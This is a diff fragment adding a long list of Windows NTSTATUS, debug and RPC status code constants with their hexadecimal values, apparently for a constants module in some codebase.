+STATUS_LOG_HARD_ERROR = 0x4000001A
+STATUS_ALREADY_WIN32 = 0x4000001B
+STATUS_WX86_UNSIMULATE = 0x4000001C
+STATUS_WX86_CONTINUE = 0x4000001D
+STATUS_WX86_SINGLE_STEP = 0x4000001E
+STATUS_WX86_BREAKPOINT = 0x4000001F
+STATUS_WX86_EXCEPTION_CONTINUE = 0x40000020
+STATUS_WX86_EXCEPTION_LASTCHANCE = 0x40000021
+STATUS_WX86_EXCEPTION_CHAIN = 0x40000022
+STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x40000023
+STATUS_NO_YIELD_PERFORMED = 0x40000024
+STATUS_TIMER_RESUME_IGNORED = 0x40000025
+STATUS_ARBITRATION_UNHANDLED = 0x40000026
+STATUS_CARDBUS_NOT_SUPPORTED = 0x40000027
+STATUS_WX86_CREATEWX86TIB = 0x40000028
+STATUS_MP_PROCESSOR_MISMATCH = 0x40000029
+STATUS_HIBERNATED = 0x4000002A
+STATUS_RESUME_HIBERNATION = 0x4000002B
+STATUS_FIRMWARE_UPDATED = 0x4000002C
+STATUS_DRIVERS_LEAKING_LOCKED_PAGES = 0x4000002D
+STATUS_MESSAGE_RETRIEVED = 0x4000002E
+STATUS_SYSTEM_POWERSTATE_TRANSITION = 0x4000002F
+STATUS_ALPC_CHECK_COMPLETION_LIST = 0x40000030
+STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x40000031
+STATUS_ACCESS_AUDIT_BY_POLICY = 0x40000032
+STATUS_ABANDON_HIBERFILE = 0x40000033
+STATUS_BIZRULES_NOT_ENABLED = 0x40000034
+STATUS_WAKE_SYSTEM = 0x40000294
+STATUS_DS_SHUTTING_DOWN = 0x40000370
+DBG_REPLY_LATER = 0x40010001
+DBG_UNABLE_TO_PROVIDE_HANDLE = 0x40010002
+DBG_TERMINATE_THREAD = 0x40010003
+DBG_TERMINATE_PROCESS = 0x40010004
+DBG_CONTROL_C = 0x40010005
+DBG_PRINTEXCEPTION_C = 0x40010006
+DBG_RIPEXCEPTION = 0x40010007
+DBG_CONTROL_BREAK = 0x40010008
+DBG_COMMAND_EXCEPTION = 0x40010009
+RPC_NT_UUID_LOCAL_ONLY = 0x40020056
+RPC_NT_SEND_INCOMPLETE = 0x400200AF
+STATUS_CTX_CDM_CONNECT = 0x400A0004
+STATUS_CTX_CDM_DISCONNECT = 0x400A0005
+STATUS_SXS_RELEASE_ACTIVATION_CONTEXT = 0x4015000D
+STATUS_RECOVERY_NOT_NEEDED = 0x40190034
+STATUS_RM_ALREADY_STARTED = 0x40190035
+STATUS_LOG_NO_RESTART = 0x401A000C
+STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST = 0x401B00EC
+STATUS_GRAPHICS_PARTIAL_DATA_POPULATED = 0x401E000A
+STATUS_GRAPHICS_DRIVER_MISMATCH = 0x401E0117
+STATUS_GRAPHICS_MODE_NOT_PINNED = 0x401E0307
+STATUS_GRAPHICS_NO_PREFERRED_MODE = 0x401E031E
+STATUS_GRAPHICS_DATASET_IS_EMPTY = 0x401E034B
+STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET = 0x401E034C
+STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED = 0x401E0351
+STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS = 0x401E042F
+STATUS_GRAPHICS_LEADLINK_START_DEFERRED = 0x401E0437
+STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY = 0x401E0439
+STATUS_GRAPHICS_START_DEFERRED = 0x401E043A
+STATUS_NDIS_INDICATION_REQUIRED = 0x40230001
+STATUS_GUARD_PAGE_VIOLATION = 0x80000001
+STATUS_DATATYPE_MISALIGNMENT = 0x80000002
+STATUS_BREAKPOINT = 0x80000003
+STATUS_SINGLE_STEP = 0x80000004
+STATUS_BUFFER_OVERFLOW = 0x80000005
+STATUS_NO_MORE_FILES = 0x80000006
+STATUS_WAKE_SYSTEM_DEBUGGER = 0x80000007
+STATUS_HANDLES_CLOSED = 0x8000000A
+STATUS_NO_INHERITANCE = 0x8000000B
+STATUS_GUID_SUBSTITUTION_MADE = 0x8000000C
+STATUS_PARTIAL_COPY = 0x8000000D
+STATUS_DEVICE_PAPER_EMPTY = 0x8000000E
+STATUS_DEVICE_POWERED_OFF = 0x8000000F
+STATUS_DEVICE_OFF_LINE = 0x80000010
+STATUS_DEVICE_BUSY = 0x80000011
+STATUS_NO_MORE_EAS = 0x80000012
+STATUS_INVALID_EA_NAME = 0x80000013
+STATUS_EA_LIST_INCONSISTENT = 0x80000014
+STATUS_INVALID_EA_FLAG = 0x80000015
+STATUS_VERIFY_REQUIRED = 0x80000016
+STATUS_EXTRANEOUS_INFORMATION = 0x80000017
+STATUS_RXACT_COMMIT_NECESSARY = 0x80000018
+STATUS_NO_MORE_ENTRIES = 0x8000001A
+STATUS_FILEMARK_DETECTED = 0x8000001B
+STATUS_MEDIA_CHANGED = 0x8000001C
+STATUS_BUS_RESET = 0x8000001D
+STATUS_END_OF_MEDIA = 0x8000001E
+STATUS_BEGINNING_OF_MEDIA = 0x8000001F
+STATUS_MEDIA_CHECK = 0x80000020
+STATUS_SETMARK_DETECTED = 0x80000021
+STATUS_NO_DATA_DETECTED = 0x80000022
+STATUS_REDIRECTOR_HAS_OPEN_HANDLES = 0x80000023
+STATUS_SERVER_HAS_OPEN_HANDLES = 0x80000024
+STATUS_ALREADY_DISCONNECTED = 0x80000025
+STATUS_LONGJUMP = 0x80000026
+STATUS_CLEANER_CARTRIDGE_INSTALLED = 0x80000027
+STATUS_PLUGPLAY_QUERY_VETOED = 0x80000028
+STATUS_UNWIND_CONSOLIDATE = 0x80000029
+STATUS_REGISTRY_HIVE_RECOVERED = 0x8000002A
+STATUS_DLL_MIGHT_BE_INSECURE = 0x8000002B
+STATUS_DLL_MIGHT_BE_INCOMPATIBLE = 0x8000002C
+STATUS_STOPPED_ON_SYMLINK = 0x8000002D
+STATUS_DEVICE_REQUIRES_CLEANING = 0x80000288
+STATUS_DEVICE_DOOR_OPEN = 0x80000289
+STATUS_DATA_LOST_REPAIR = 0x80000803
+DBG_EXCEPTION_NOT_HANDLED = 0x80010001
+STATUS_CLUSTER_NODE_ALREADY_UP = 0x80130001
+STATUS_CLUSTER_NODE_ALREADY_DOWN = 0x80130002
+STATUS_CLUSTER_NETWORK_ALREADY_ONLINE = 0x80130003
+STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x80130004
+STATUS_CLUSTER_NODE_ALREADY_MEMBER = 0x80130005
+STATUS_COULD_NOT_RESIZE_LOG = 0x80190009
+STATUS_NO_TXF_METADATA = 0x80190029
+STATUS_CANT_RECOVER_WITH_HANDLE_OPEN = 0x80190031
+STATUS_TXF_METADATA_ALREADY_PRESENT = 0x80190041
+STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x80190042
+STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED = 0x801B00EB
+STATUS_FLT_BUFFER_TOO_SMALL = 0x801C0001
+STATUS_FVE_PARTIAL_METADATA = 0x80210001
+STATUS_FVE_TRANSIENT_STATE = 0x80210002
+STATUS_UNSUCCESSFUL = 0xC0000001
+STATUS_NOT_IMPLEMENTED = 0xC0000002
+STATUS_INVALID_INFO_CLASS = 0xC0000003
+STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
+STATUS_ACCESS_VIOLATION = 0xC0000005
+STATUS_IN_PAGE_ERROR = 0xC0000006
+STATUS_PAGEFILE_QUOTA = 0xC0000007
+STATUS_INVALID_HANDLE = 0xC0000008
+STATUS_BAD_INITIAL_STACK = 0xC0000009
+STATUS_BAD_INITIAL_PC = 0xC000000A
+STATUS_INVALID_CID = 0xC000000B
+STATUS_TIMER_NOT_CANCELED = 0xC000000C
+STATUS_INVALID_PARAMETER = 0xC000000D
+STATUS_NO_SUCH_DEVICE = 0xC000000E
+STATUS_NO_SUCH_FILE = 0xC000000F
+STATUS_INVALID_DEVICE_REQUEST = 0xC0000010
+STATUS_END_OF_FILE = 0xC0000011
+STATUS_WRONG_VOLUME = 0xC0000012
+STATUS_NO_MEDIA_IN_DEVICE = 0xC0000013
+STATUS_UNRECOGNIZED_MEDIA = 0xC0000014
+STATUS_NONEXISTENT_SECTOR = 0xC0000015
+STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016
+STATUS_NO_MEMORY = 0xC0000017
+STATUS_CONFLICTING_ADDRESSES = 0xC0000018
+STATUS_NOT_MAPPED_VIEW = 0xC0000019
+STATUS_UNABLE_TO_FREE_VM = 0xC000001A
+STATUS_UNABLE_TO_DELETE_SECTION = 0xC000001B
+STATUS_INVALID_SYSTEM_SERVICE = 0xC000001C
+STATUS_ILLEGAL_INSTRUCTION = 0xC000001D
+STATUS_INVALID_LOCK_SEQUENCE = 0xC000001E
+STATUS_INVALID_VIEW_SIZE = 0xC000001F
+STATUS_INVALID_FILE_FOR_SECTION = 0xC0000020
+STATUS_ALREADY_COMMITTED = 0xC0000021
+STATUS_ACCESS_DENIED = 0xC0000022
+STATUS_BUFFER_TOO_SMALL = 0xC0000023
+STATUS_OBJECT_TYPE_MISMATCH = 0xC0000024
+STATUS_NONCONTINUABLE_EXCEPTION = 0xC0000025
+STATUS_INVALID_DISPOSITION = 0xC0000026
+STATUS_UNWIND = 0xC0000027
+STATUS_BAD_STACK = 0xC0000028
+STATUS_INVALID_UNWIND_TARGET = 0xC0000029
+STATUS_NOT_LOCKED = 0xC000002A
+STATUS_PARITY_ERROR = 0xC000002B
+STATUS_UNABLE_TO_DECOMMIT_VM = 0xC000002C
+STATUS_NOT_COMMITTED = 0xC000002D
+STATUS_INVALID_PORT_ATTRIBUTES = 0xC000002E
+STATUS_PORT_MESSAGE_TOO_LONG = 0xC000002F
+STATUS_INVALID_PARAMETER_MIX = 0xC0000030
+STATUS_INVALID_QUOTA_LOWER = 0xC0000031
+STATUS_DISK_CORRUPT_ERROR = 0xC0000032
+STATUS_OBJECT_NAME_INVALID = 0xC0000033
+STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034
+STATUS_OBJECT_NAME_COLLISION = 0xC0000035
+STATUS_PORT_DISCONNECTED = 0xC0000037
+STATUS_DEVICE_ALREADY_ATTACHED = 0xC0000038
+STATUS_OBJECT_PATH_INVALID = 0xC0000039
+STATUS_OBJECT_PATH_NOT_FOUND = 0xC000003A
+STATUS_OBJECT_PATH_SYNTAX_BAD = 0xC000003B
+STATUS_DATA_OVERRUN = 0xC000003C
+STATUS_DATA_LATE_ERROR = 0xC000003D
+STATUS_DATA_ERROR = 0xC000003E
+STATUS_CRC_ERROR = 0xC000003F
+STATUS_SECTION_TOO_BIG = 0xC0000040
+STATUS_PORT_CONNECTION_REFUSED = 0xC0000041
+STATUS_INVALID_PORT_HANDLE = 0xC0000042
+STATUS_SHARING_VIOLATION = 0xC0000043
+STATUS_QUOTA_EXCEEDED = 0xC0000044
+STATUS_INVALID_PAGE_PROTECTION = 0xC0000045
+STATUS_MUTANT_NOT_OWNED = 0xC0000046
+STATUS_SEMAPHORE_LIMIT_EXCEEDED = 0xC0000047
+STATUS_PORT_ALREADY_SET = 0xC0000048
+STATUS_SECTION_NOT_IMAGE = 0xC0000049
+STATUS_SUSPEND_COUNT_EXCEEDED = 0xC000004A
+STATUS_THREAD_IS_TERMINATING = 0xC000004B
+STATUS_BAD_WORKING_SET_LIMIT = 0xC000004C
+STATUS_INCOMPATIBLE_FILE_MAP = 0xC000004D
+STATUS_SECTION_PROTECTION = 0xC000004E
+STATUS_EAS_NOT_SUPPORTED = 0xC000004F
+STATUS_EA_TOO_LARGE = 0xC0000050
+STATUS_NONEXISTENT_EA_ENTRY = 0xC0000051
+STATUS_NO_EAS_ON_FILE = 0xC0000052
+STATUS_EA_CORRUPT_ERROR = 0xC0000053
+STATUS_FILE_LOCK_CONFLICT = 0xC0000054
+STATUS_LOCK_NOT_GRANTED = 0xC0000055
+STATUS_DELETE_PENDING = 0xC0000056
+STATUS_CTL_FILE_NOT_SUPPORTED = 0xC0000057
+STATUS_UNKNOWN_REVISION = 0xC0000058
+STATUS_REVISION_MISMATCH = 0xC0000059
+STATUS_INVALID_OWNER = 0xC000005A
+STATUS_INVALID_PRIMARY_GROUP = 0xC000005B
+STATUS_NO_IMPERSONATION_TOKEN = 0xC000005C
+STATUS_CANT_DISABLE_MANDATORY = 0xC000005D
+STATUS_NO_LOGON_SERVERS = 0xC000005E
+STATUS_NO_SUCH_LOGON_SESSION = 0xC000005F
+STATUS_NO_SUCH_PRIVILEGE = 0xC0000060
+STATUS_PRIVILEGE_NOT_HELD = 0xC0000061
+STATUS_INVALID_ACCOUNT_NAME = 0xC0000062
+STATUS_USER_EXISTS = 0xC0000063
+STATUS_NO_SUCH_USER = 0xC0000064
+STATUS_GROUP_EXISTS = 0xC0000065
+STATUS_NO_SUCH_GROUP = 0xC0000066
+STATUS_MEMBER_IN_GROUP = 0xC0000067
+STATUS_MEMBER_NOT_IN_GROUP = 0xC0000068
+STATUS_LAST_ADMIN = 0xC0000069
+STATUS_WRONG_PASSWORD = 0xC000006A
+STATUS_ILL_FORMED_PASSWORD = 0xC000006B
+STATUS_PASSWORD_RESTRICTION = 0xC000006C
+STATUS_LOGON_FAILURE = 0xC000006D
+STATUS_ACCOUNT_RESTRICTION = 0xC000006E
+STATUS_INVALID_LOGON_HOURS = 0xC000006F
+STATUS_INVALID_WORKSTATION = 0xC0000070
+STATUS_PASSWORD_EXPIRED = 0xC0000071
+STATUS_ACCOUNT_DISABLED = 0xC0000072
+STATUS_NONE_MAPPED = 0xC0000073
+STATUS_TOO_MANY_LUIDS_REQUESTED = 0xC0000074
+STATUS_LUIDS_EXHAUSTED = 0xC0000075
+STATUS_INVALID_SUB_AUTHORITY = 0xC0000076
+STATUS_INVALID_ACL = 0xC0000077
+STATUS_INVALID_SID = 0xC0000078
+STATUS_INVALID_SECURITY_DESCR = 0xC0000079
+STATUS_PROCEDURE_NOT_FOUND = 0xC000007A
+STATUS_INVALID_IMAGE_FORMAT = 0xC000007B
+STATUS_NO_TOKEN = 0xC000007C
+STATUS_BAD_INHERITANCE_ACL = 0xC000007D
+STATUS_RANGE_NOT_LOCKED = 0xC000007E
+STATUS_DISK_FULL = 0xC000007F
+STATUS_SERVER_DISABLED = 0xC0000080
+STATUS_SERVER_NOT_DISABLED = 0xC0000081
+STATUS_TOO_MANY_GUIDS_REQUESTED = 0xC0000082
+STATUS_GUIDS_EXHAUSTED = 0xC0000083
+STATUS_INVALID_ID_AUTHORITY = 0xC0000084
+STATUS_AGENTS_EXHAUSTED = 0xC0000085
+STATUS_INVALID_VOLUME_LABEL = 0xC0000086
+STATUS_SECTION_NOT_EXTENDED = 0xC0000087
+STATUS_NOT_MAPPED_DATA = 0xC0000088
+STATUS_RESOURCE_DATA_NOT_FOUND = 0xC0000089
+STATUS_RESOURCE_TYPE_NOT_FOUND = 0xC000008A
+STATUS_RESOURCE_NAME_NOT_FOUND = 0xC000008B
+STATUS_ARRAY_BOUNDS_EXCEEDED = 0xC000008C
+STATUS_FLOAT_DENORMAL_OPERAND = 0xC000008D
+STATUS_FLOAT_DIVIDE_BY_ZERO = 0xC000008E
+STATUS_FLOAT_INEXACT_RESULT = 0xC000008F
+STATUS_FLOAT_INVALID_OPERATION = 0xC0000090
+STATUS_FLOAT_OVERFLOW = 0xC0000091
+STATUS_FLOAT_STACK_CHECK = 0xC0000092
+STATUS_FLOAT_UNDERFLOW = 0xC0000093
+STATUS_INTEGER_DIVIDE_BY_ZERO = 0xC0000094
+STATUS_INTEGER_OVERFLOW = 0xC0000095
+STATUS_PRIVILEGED_INSTRUCTION = 0xC0000096
+STATUS_TOO_MANY_PAGING_FILES = 0xC0000097
+STATUS_FILE_INVALID = 0xC0000098
+STATUS_ALLOTTED_SPACE_EXCEEDED = 0xC0000099
+STATUS_INSUFFICIENT_RESOURCES = 0xC000009A
+STATUS_DFS_EXIT_PATH_FOUND = 0xC000009B
+STATUS_DEVICE_DATA_ERROR = 0xC000009C
+STATUS_DEVICE_NOT_CONNECTED = 0xC000009D
+STATUS_FREE_VM_NOT_AT_BASE = 0xC000009F
+STATUS_MEMORY_NOT_ALLOCATED = 0xC00000A0
+STATUS_WORKING_SET_QUOTA = 0xC00000A1
+STATUS_MEDIA_WRITE_PROTECTED = 0xC00000A2
+STATUS_DEVICE_NOT_READY = 0xC00000A3
+STATUS_INVALID_GROUP_ATTRIBUTES = 0xC00000A4
+STATUS_BAD_IMPERSONATION_LEVEL = 0xC00000A5
+STATUS_CANT_OPEN_ANONYMOUS = 0xC00000A6
+STATUS_BAD_VALIDATION_CLASS = 0xC00000A7
+STATUS_BAD_TOKEN_TYPE = 0xC00000A8
+STATUS_BAD_MASTER_BOOT_RECORD = 0xC00000A9
+STATUS_INSTRUCTION_MISALIGNMENT = 0xC00000AA
+STATUS_INSTANCE_NOT_AVAILABLE = 0xC00000AB
+STATUS_PIPE_NOT_AVAILABLE = 0xC00000AC
+STATUS_INVALID_PIPE_STATE = 0xC00000AD
+STATUS_PIPE_BUSY = 0xC00000AE
+STATUS_ILLEGAL_FUNCTION = 0xC00000AF
+STATUS_PIPE_DISCONNECTED = 0xC00000B0
+STATUS_PIPE_CLOSING = 0xC00000B1
+STATUS_PIPE_CONNECTED = 0xC00000B2
+STATUS_PIPE_LISTENING = 0xC00000B3
+STATUS_INVALID_READ_MODE = 0xC00000B4
+STATUS_IO_TIMEOUT = 0xC00000B5
+STATUS_FILE_FORCED_CLOSED = 0xC00000B6
+STATUS_PROFILING_NOT_STARTED = 0xC00000B7
+STATUS_PROFILING_NOT_STOPPED = 0xC00000B8
+STATUS_COULD_NOT_INTERPRET = 0xC00000B9
+STATUS_FILE_IS_A_DIRECTORY = 0xC00000BA
+STATUS_NOT_SUPPORTED = 0xC00000BB
+STATUS_REMOTE_NOT_LISTENING = 0xC00000BC
+STATUS_DUPLICATE_NAME = 0xC00000BD
+STATUS_BAD_NETWORK_PATH = 0xC00000BE
+STATUS_NETWORK_BUSY = 0xC00000BF
+STATUS_DEVICE_DOES_NOT_EXIST = 0xC00000C0
+STATUS_TOO_MANY_COMMANDS = 0xC00000C1
+STATUS_ADAPTER_HARDWARE_ERROR = 0xC00000C2
+STATUS_INVALID_NETWORK_RESPONSE = 0xC00000C3
+STATUS_UNEXPECTED_NETWORK_ERROR = 0xC00000C4
+STATUS_BAD_REMOTE_ADAPTER = 0xC00000C5
+STATUS_PRINT_QUEUE_FULL = 0xC00000C6
+STATUS_NO_SPOOL_SPACE = 0xC00000C7
+STATUS_PRINT_CANCELLED = 0xC00000C8
+STATUS_NETWORK_NAME_DELETED = 0xC00000C9
+STATUS_NETWORK_ACCESS_DENIED = 0xC00000CA
+STATUS_BAD_DEVICE_TYPE = 0xC00000CB
+STATUS_BAD_NETWORK_NAME = 0xC00000CC
+STATUS_TOO_MANY_NAMES = 0xC00000CD
+STATUS_TOO_MANY_SESSIONS = 0xC00000CE
+STATUS_SHARING_PAUSED = 0xC00000CF
+STATUS_REQUEST_NOT_ACCEPTED = 0xC00000D0
+STATUS_REDIRECTOR_PAUSED = 0xC00000D1
+STATUS_NET_WRITE_FAULT = 0xC00000D2
+STATUS_PROFILING_AT_LIMIT = 0xC00000D3
+STATUS_NOT_SAME_DEVICE = 0xC00000D4
+STATUS_FILE_RENAMED = 0xC00000D5
+STATUS_VIRTUAL_CIRCUIT_CLOSED = 0xC00000D6
+STATUS_NO_SECURITY_ON_OBJECT = 0xC00000D7
+STATUS_CANT_WAIT = 0xC00000D8
+STATUS_PIPE_EMPTY = 0xC00000D9
+STATUS_CANT_ACCESS_DOMAIN_INFO = 0xC00000DA
+STATUS_CANT_TERMINATE_SELF = 0xC00000DB
+STATUS_INVALID_SERVER_STATE = 0xC00000DC
+STATUS_INVALID_DOMAIN_STATE = 0xC00000DD
+STATUS_INVALID_DOMAIN_ROLE = 0xC00000DE
+STATUS_NO_SUCH_DOMAIN = 0xC00000DF
+STATUS_DOMAIN_EXISTS = 0xC00000E0
+STATUS_DOMAIN_LIMIT_EXCEEDED = 0xC00000E1
+STATUS_OPLOCK_NOT_GRANTED = 0xC00000E2
+STATUS_INVALID_OPLOCK_PROTOCOL = 0xC00000E3
+STATUS_INTERNAL_DB_CORRUPTION = 0xC00000E4
+STATUS_INTERNAL_ERROR = 0xC00000E5
+STATUS_GENERIC_NOT_MAPPED = 0xC00000E6
+STATUS_BAD_DESCRIPTOR_FORMAT = 0xC00000E7
+STATUS_INVALID_USER_BUFFER = 0xC00000E8
+STATUS_UNEXPECTED_IO_ERROR = 0xC00000E9
+STATUS_UNEXPECTED_MM_CREATE_ERR = 0xC00000EA
+STATUS_UNEXPECTED_MM_MAP_ERROR = 0xC00000EB
+STATUS_UNEXPECTED_MM_EXTEND_ERR = 0xC00000EC
+STATUS_NOT_LOGON_PROCESS = 0xC00000ED
+STATUS_LOGON_SESSION_EXISTS = 0xC00000EE
+STATUS_INVALID_PARAMETER_1 = 0xC00000EF
+STATUS_INVALID_PARAMETER_2 = 0xC00000F0
+STATUS_INVALID_PARAMETER_3 = 0xC00000F1
+STATUS_INVALID_PARAMETER_4 = 0xC00000F2
+STATUS_INVALID_PARAMETER_5 = 0xC00000F3
+STATUS_INVALID_PARAMETER_6 = 0xC00000F4
+STATUS_INVALID_PARAMETER_7 = 0xC00000F5
+STATUS_INVALID_PARAMETER_8 = 0xC00000F6
+STATUS_INVALID_PARAMETER_9 = 0xC00000F7
+STATUS_INVALID_PARAMETER_10 = 0xC00000F8
+STATUS_INVALID_PARAMETER_11 = 0xC00000F9
+STATUS_INVALID_PARAMETER_12 = 0xC00000FA
+STATUS_REDIRECTOR_NOT_STARTED = 0xC00000FB
+STATUS_REDIRECTOR_STARTED = 0xC00000FC
+STATUS_STACK_OVERFLOW = 0xC00000FD
+STATUS_NO_SUCH_PACKAGE = 0xC00000FE
+STATUS_BAD_FUNCTION_TABLE = 0xC00000FF
+STATUS_VARIABLE_NOT_FOUND = 0xC0000100
+STATUS_DIRECTORY_NOT_EMPTY = 0xC0000101
+STATUS_FILE_CORRUPT_ERROR = 0xC0000102
+STATUS_NOT_A_DIRECTORY = 0xC0000103
+STATUS_BAD_LOGON_SESSION_STATE = 0xC0000104
+STATUS_LOGON_SESSION_COLLISION = 0xC0000105
+STATUS_NAME_TOO_LONG = 0xC0000106
+STATUS_FILES_OPEN = 0xC0000107
+STATUS_CONNECTION_IN_USE = 0xC0000108
+STATUS_MESSAGE_NOT_FOUND = 0xC0000109
+STATUS_PROCESS_IS_TERMINATING = 0xC000010A
+STATUS_INVALID_LOGON_TYPE = 0xC000010B
+STATUS_NO_GUID_TRANSLATION = 0xC000010C
+STATUS_CANNOT_IMPERSONATE = 0xC000010D
+STATUS_IMAGE_ALREADY_LOADED = 0xC000010E
+STATUS_NO_LDT = 0xC0000117
+STATUS_INVALID_LDT_SIZE = 0xC0000118
+STATUS_INVALID_LDT_OFFSET = 0xC0000119
+STATUS_INVALID_LDT_DESCRIPTOR = 0xC000011A
+STATUS_INVALID_IMAGE_NE_FORMAT = 0xC000011B
+STATUS_RXACT_INVALID_STATE = 0xC000011C
+STATUS_RXACT_COMMIT_FAILURE = 0xC000011D
+STATUS_MAPPED_FILE_SIZE_ZERO = 0xC000011E
+STATUS_TOO_MANY_OPENED_FILES = 0xC000011F
+STATUS_CANCELLED = 0xC0000120
+STATUS_CANNOT_DELETE = 0xC0000121
+STATUS_INVALID_COMPUTER_NAME = 0xC0000122
+STATUS_FILE_DELETED = 0xC0000123
+STATUS_SPECIAL_ACCOUNT = 0xC0000124
+STATUS_SPECIAL_GROUP = 0xC0000125
+STATUS_SPECIAL_USER = 0xC0000126
+STATUS_MEMBERS_PRIMARY_GROUP = 0xC0000127
+STATUS_FILE_CLOSED = 0xC0000128
+STATUS_TOO_MANY_THREADS = 0xC0000129
+STATUS_THREAD_NOT_IN_PROCESS = 0xC000012A
+STATUS_TOKEN_ALREADY_IN_USE = 0xC000012B
+STATUS_PAGEFILE_QUOTA_EXCEEDED = 0xC000012C
+STATUS_COMMITMENT_LIMIT = 0xC000012D
+STATUS_INVALID_IMAGE_LE_FORMAT = 0xC000012E
+STATUS_INVALID_IMAGE_NOT_MZ = 0xC000012F
+STATUS_INVALID_IMAGE_PROTECT = 0xC0000130
+STATUS_INVALID_IMAGE_WIN_16 = 0xC0000131
+STATUS_LOGON_SERVER_CONFLICT = 0xC0000132
+STATUS_TIME_DIFFERENCE_AT_DC = 0xC0000133
+STATUS_SYNCHRONIZATION_REQUIRED = 0xC0000134
+STATUS_DLL_NOT_FOUND = 0xC0000135
+STATUS_OPEN_FAILED = 0xC0000136
+STATUS_IO_PRIVILEGE_FAILED = 0xC0000137
+STATUS_ORDINAL_NOT_FOUND = 0xC0000138
+STATUS_ENTRYPOINT_NOT_FOUND = 0xC0000139
+STATUS_CONTROL_C_EXIT = 0xC000013A
+STATUS_LOCAL_DISCONNECT = 0xC000013B
+STATUS_REMOTE_DISCONNECT = 0xC000013C
+STATUS_REMOTE_RESOURCES = 0xC000013D
+STATUS_LINK_FAILED = 0xC000013E
+STATUS_LINK_TIMEOUT = 0xC000013F
+STATUS_INVALID_CONNECTION = 0xC0000140
+STATUS_INVALID_ADDRESS = 0xC0000141
+STATUS_DLL_INIT_FAILED = 0xC0000142
+STATUS_MISSING_SYSTEMFILE = 0xC0000143
+STATUS_UNHANDLED_EXCEPTION = 0xC0000144
+STATUS_APP_INIT_FAILURE = 0xC0000145
+STATUS_PAGEFILE_CREATE_FAILED = 0xC0000146
+STATUS_NO_PAGEFILE = 0xC0000147
+STATUS_INVALID_LEVEL = 0xC0000148
+STATUS_WRONG_PASSWORD_CORE = 0xC0000149
+STATUS_ILLEGAL_FLOAT_CONTEXT = 0xC000014A
+STATUS_PIPE_BROKEN = 0xC000014B
+STATUS_REGISTRY_CORRUPT = 0xC000014C
+STATUS_REGISTRY_IO_FAILED = 0xC000014D
+STATUS_NO_EVENT_PAIR = 0xC000014E
+STATUS_UNRECOGNIZED_VOLUME = 0xC000014F
+STATUS_SERIAL_NO_DEVICE_INITED = 0xC0000150
+STATUS_NO_SUCH_ALIAS = 0xC0000151
+STATUS_MEMBER_NOT_IN_ALIAS = 0xC0000152
+STATUS_MEMBER_IN_ALIAS = 0xC0000153
+STATUS_ALIAS_EXISTS = 0xC0000154
+STATUS_LOGON_NOT_GRANTED = 0xC0000155
+STATUS_TOO_MANY_SECRETS = 0xC0000156
+STATUS_SECRET_TOO_LONG = 0xC0000157
+STATUS_INTERNAL_DB_ERROR = 0xC0000158
+STATUS_FULLSCREEN_MODE = 0xC0000159
+STATUS_TOO_MANY_CONTEXT_IDS = 0xC000015A
+STATUS_LOGON_TYPE_NOT_GRANTED = 0xC000015B
+STATUS_NOT_REGISTRY_FILE = 0xC000015C
+STATUS_NT_CROSS_ENCRYPTION_REQUIRED = 0xC000015D
+STATUS_DOMAIN_CTRLR_CONFIG_ERROR = 0xC000015E
+STATUS_FT_MISSING_MEMBER = 0xC000015F
+STATUS_ILL_FORMED_SERVICE_ENTRY = 0xC0000160
+STATUS_ILLEGAL_CHARACTER = 0xC0000161
+STATUS_UNMAPPABLE_CHARACTER = 0xC0000162
+STATUS_UNDEFINED_CHARACTER = 0xC0000163
+STATUS_FLOPPY_VOLUME = 0xC0000164
+STATUS_FLOPPY_ID_MARK_NOT_FOUND = 0xC0000165
+STATUS_FLOPPY_WRONG_CYLINDER = 0xC0000166
+STATUS_FLOPPY_UNKNOWN_ERROR = 0xC0000167
+STATUS_FLOPPY_BAD_REGISTERS = 0xC0000168
+STATUS_DISK_RECALIBRATE_FAILED = 0xC0000169
+STATUS_DISK_OPERATION_FAILED = 0xC000016A
+STATUS_DISK_RESET_FAILED = 0xC000016B
+STATUS_SHARED_IRQ_BUSY = 0xC000016C
+STATUS_FT_ORPHANING = 0xC000016D
+STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0xC000016E
+STATUS_PARTITION_FAILURE = 0xC0000172
+STATUS_INVALID_BLOCK_LENGTH = 0xC0000173
+STATUS_DEVICE_NOT_PARTITIONED = 0xC0000174
+STATUS_UNABLE_TO_LOCK_MEDIA = 0xC0000175
+STATUS_UNABLE_TO_UNLOAD_MEDIA = 0xC0000176
+STATUS_EOM_OVERFLOW = 0xC0000177
+STATUS_NO_MEDIA = 0xC0000178
+STATUS_NO_SUCH_MEMBER = 0xC000017A
+STATUS_INVALID_MEMBER = 0xC000017B
+STATUS_KEY_DELETED = 0xC000017C
+STATUS_NO_LOG_SPACE = 0xC000017D
+STATUS_TOO_MANY_SIDS = 0xC000017E
+STATUS_LM_CROSS_ENCRYPTION_REQUIRED = 0xC000017F
+STATUS_KEY_HAS_CHILDREN = 0xC0000180
+STATUS_CHILD_MUST_BE_VOLATILE = 0xC0000181
+STATUS_DEVICE_CONFIGURATION_ERROR = 0xC0000182
+STATUS_DRIVER_INTERNAL_ERROR = 0xC0000183
+STATUS_INVALID_DEVICE_STATE = 0xC0000184
+STATUS_IO_DEVICE_ERROR = 0xC0000185
+STATUS_DEVICE_PROTOCOL_ERROR = 0xC0000186
+STATUS_BACKUP_CONTROLLER = 0xC0000187
+STATUS_LOG_FILE_FULL = 0xC0000188
+STATUS_TOO_LATE = 0xC0000189
+STATUS_NO_TRUST_LSA_SECRET = 0xC000018A
+STATUS_NO_TRUST_SAM_ACCOUNT = 0xC000018B
+STATUS_TRUSTED_DOMAIN_FAILURE = 0xC000018C
+STATUS_TRUSTED_RELATIONSHIP_FAILURE = 0xC000018D
+STATUS_EVENTLOG_FILE_CORRUPT = 0xC000018E
